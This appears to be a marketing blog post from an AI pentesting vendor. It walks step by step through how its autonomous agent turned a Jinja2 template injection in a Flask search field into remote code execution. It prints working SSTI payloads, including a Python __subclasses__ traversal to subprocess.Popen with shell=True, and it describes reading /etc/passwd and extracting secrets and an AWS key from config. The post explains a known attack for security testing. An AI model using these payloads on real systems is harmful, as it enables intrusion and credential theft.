SSTI to RCE: How Revelion Exploited a Template Injection in Under 60 Seconds
Server-Side Template Injection sits in a category of vulnerabilities that scanners systematically underreport. They detect the symptom (user input reflected in rendered output) and flag it as medium severity. But SSTI in modern template engines like Jinja2, Twig, and Freemarker frequently chains directly to Remote Code Execution, making it one of the most dangerous web vulnerability classes when it appears. This is a step-by-step breakdown of how Revelion's autonomous agents went from initial discovery to proven RCE in 47 seconds.
T+0s: Recon Agent Identifies the Injection Surface
The recon agent is crawling the target application, a Python/Flask web app with a user-facing search feature. The search page at /search?q=test renders the search term directly in the page body: “Showing results for: test.” The recon agent flags this as a potential template injection surface because the user input is being rendered server-side, not client-side through JavaScript DOM manipulation. The response contains no X-Content-Type-Options or CSP headers, but more importantly, the HTML source shows the search term is embedded directly in the template output without escaping through a safe filter.
At this point, the recon agent has a hypothesis, not a confirmed finding. The input is reflected in rendered output, which could be simple string concatenation, client-side rendering, or actual template evaluation. The distinction matters enormously. The recon agent tags this endpoint as a high-priority candidate for template injection testing and propagates it to the injection agent through the shared context graph.
T+6s: Injection Agent Confirms SSTI with Arithmetic Probe
The injection agent sends its first probe: /search?q={{ 7*7 }}. The response body contains “Showing results for: 49.” The template engine evaluated the arithmetic expression and returned the result. SSTI is confirmed.
This is the critical moment where a scanner and an AI pentester diverge completely. A scanner would log this as “Server-Side Template Injection - Medium Severity” with a CVSS score somewhere around 5.3 to 6.1, depending on the tool's assessment of potential impact. The remediation advice would be generic: “Avoid passing user input to template engines” or “Use sandboxed template rendering.” The scanner moves on to the next endpoint.
Revelion's injection agent does not move on. It has confirmed that the template engine evaluates expressions. The next question is: which template engine, and what is the exploitation ceiling? The agent needs to determine whether this SSTI can reach code execution or whether the template engine's sandbox restricts it to expression evaluation only.
T+11s: Template Engine Fingerprinting
The injection agent sends a series of engine-specific payloads to identify the template engine. It tests {{ 7*'7' }}, which returns “7777777” (the string '7' repeated seven times). This behaviour is characteristic of Jinja2: it treats the multiplication of an integer by a string as string repetition, consistent with Python's semantics. Twig would return “49” (it coerces the string to integer). Freemarker would throw an error. The agent confirms Jinja2 with high confidence.
Knowing the engine is Jinja2 on Python/Flask is significant because Jinja2's default configuration does not sandbox template execution. Unlike some template engines that restrict access to a whitelist of functions, Jinja2 exposes Python's full object hierarchy through the template context. If the agent can navigate from a base object to Python's subprocess or os modules, code execution is achievable.
T+18s: Escalating from Expression Evaluation to Python Builtins
The agent begins navigating Python's Method Resolution Order (MRO) to access restricted classes. It sends: {{ ''.__class__.__mro__[1].__subclasses__() }}. This payload starts with an empty string object, traverses up to the base object class via MRO, and lists all subclasses registered in the Python runtime. The response is a massive list of class references.
The agent parses this list programmatically, searching for classes that provide file system or process execution capabilities. It identifies subprocess.Popen at index 351 in the subclasses list. This is the pivot point. subprocess.Popen allows arbitrary command execution on the host operating system.
This step is where the exploitation gets technically dense, and it is also where manual exploitation typically stalls. A human researcher would need to manually inspect the subclasses list (which often contains 400+ entries), identify the right class index, and construct the correct payload syntax. This is a tedious, error-prone process that involves trial and error. The agent does it programmatically in seconds.
T+31s: Achieving Remote Code Execution
The agent constructs the RCE payload: {{ ''.__class__.__mro__[1].__subclasses__()[351]('id', shell=True, stdout=-1).communicate()[0] }}. The response contains: uid=1000(www-data) gid=1000(www-data) groups=1000(www-data).
Remote Code Execution is confirmed. The template injection allows arbitrary command execution on the host, running as the www-data user. The agent has gone from a search field that reflects user input to executing operating system commands, without any human intervention and without any prior knowledge of the application's technology stack beyond what it discovered through probing.
The agent does not stop at proving command execution. It needs to demonstrate the full impact for the report to be actionable.
T+38s: Proving File System Access
The agent reads /etc/passwd to prove file system access. The response returns the full contents of the passwd file, confirming that the www-data user has read access to system files. It also reads the application's config.py file, extracting the database connection string, the Flask secret key, and an AWS access key that was hardcoded in the configuration.
Each of these reads is captured as a request/response pair in the evidence log. The report will contain the exact HTTP requests sent, the exact responses received, and the exact data extracted. There is no ambiguity about whether this vulnerability is exploitable. The proof is complete and reproducible.
T+47s: Full Proof-of-Concept Documented
At 47 seconds from initial discovery, the agent has completed the full kill chain and documented every step. The final report contains:
- The initial discovery: reflected input in template-rendered output
- SSTI confirmation: arithmetic evaluation proof (
7*7=49) - Engine identification: Jinja2 on Python/Flask
- Exploitation escalation: MRO traversal to
subprocess.Popen - RCE proof:
idcommand output showingwww-dataexecution context - Impact demonstration:
/etc/passwdread, application config extraction, credential exposure - Every HTTP request and response pair, timestamped and sequenced
The CVSS score is recalculated based on proven impact, not theoretical risk. This is not a “possible SSTI (medium)” finding. It is a confirmed SSTI-to-RCE chain with demonstrated file system access and credential extraction: CVSS 9.8, with evidence that makes the rating indisputable.
The Manual Comparison: 30-60 Minutes for the Same Chain
A skilled penetration tester running through this same chain manually would follow an identical logical process. The difference is time and consistency. The manual process looks like this:
First, the researcher identifies the reflected input and suspects template injection. They test with {{7*7}} and confirm SSTI. This takes 2-5 minutes, including the time to notice the injection point during manual crawling. Next, they fingerprint the template engine using a decision tree (usually referencing PortSwigger's SSTI methodology or their own notes). Another 3-5 minutes. Then they begin constructing the MRO traversal payload. This is where the time expands significantly. The researcher needs to dump the subclasses list, search through hundreds of entries, identify a useful class, determine its index, and build the correct payload syntax. Depending on experience and whether they have pre-built payloads in their notes, this takes 10-30 minutes. Factor in false starts, typos in the payload, and the occasional need to URL-encode nested quotes, and a 30-60 minute timeline is realistic.
Revelion completes the same chain in 47 seconds because it does not hesitate between steps, does not make transcription errors, does not need to look up payload syntax, and does not lose time context-switching between testing and documentation. It also captures every request/response pair automatically, eliminating the post-exploitation documentation phase that typically adds another 15-30 minutes to a manual engagement.
The Scanner Comparison: “Possible SSTI (Medium)”
A vulnerability scanner testing the same endpoint would send a basic probe, detect that user input is reflected in rendered output, and flag it as “possible Server-Side Template Injection.” The severity would be medium, possibly high if the scanner has a rule that escalates SSTI findings. The report would include a description of what SSTI is, a generic remediation recommendation, and no proof of exploitability.
The scanner cannot confirm which template engine is running. It cannot navigate the MRO to find exploitable classes. It cannot prove code execution. It cannot demonstrate file system access. The finding would sit in a report alongside 200 other medium-severity items, competing for remediation attention with missing security headers and cookie flags. The team receiving the report has no way to prioritize it because the scanner could not prove what an attacker could actually do with it.
This is the gap that generates real-world breaches. The vulnerability exists. A scanner detected it, technically. But without proof of impact, it gets deprioritized. It sits in a backlog for months. Meanwhile, a human attacker or a less scrupulous autonomous AI system finds the same SSTI and runs the same chain. The difference between “possible SSTI (medium)” and “confirmed SSTI-to-RCE with credential extraction (critical)” is the difference between a backlog item and an incident response.
Why This Matters for Your Security Programme
SSTI-to-RCE is not a rare or exotic attack. It appears regularly in bug bounty programmes, in CTF challenges, and in production applications. Jinja2, Twig, Freemarker, Velocity, Pebble: template injection exists across every major web framework ecosystem. The exploitation techniques are well-documented, and the tooling (both offensive and defensive) is mature.
The question is not whether SSTI exists in your applications. It is whether your current testing methodology would catch it, prove it, and report it with enough evidence to drive immediate remediation. If your security testing produces reports that say “possible template injection” without proving the exploitation chain, you are relying on your development team to assume the worst-case scenario for every medium-severity finding. That does not happen. It has never happened at any organisation, at any scale.
For a deeper look at how the agent architecture enables this kind of rapid, autonomous exploitation, read our complete guide to autonomous AI pentesting. To understand how AI pentesting compares to traditional scanning across a broader range of vulnerability classes, see AI pentesting vs vulnerability scanning.
See what Revelion finds in your applications. Start free with 20,000 credits.
Related Content
What is Autonomous AI Pentesting?
A comprehensive guide to autonomous AI penetration testing: how intelligent agents perform reconnaissance, exploitation, and reporting without manual intervention, with real benchmark results.
AI Pentesting vs Vulnerability Scanning: What Actually Changes
Vulnerability scanners check for known signatures. AI pentesting thinks, adapts, and proves exploitability. Here's what actually changes, and why it matters for your security posture.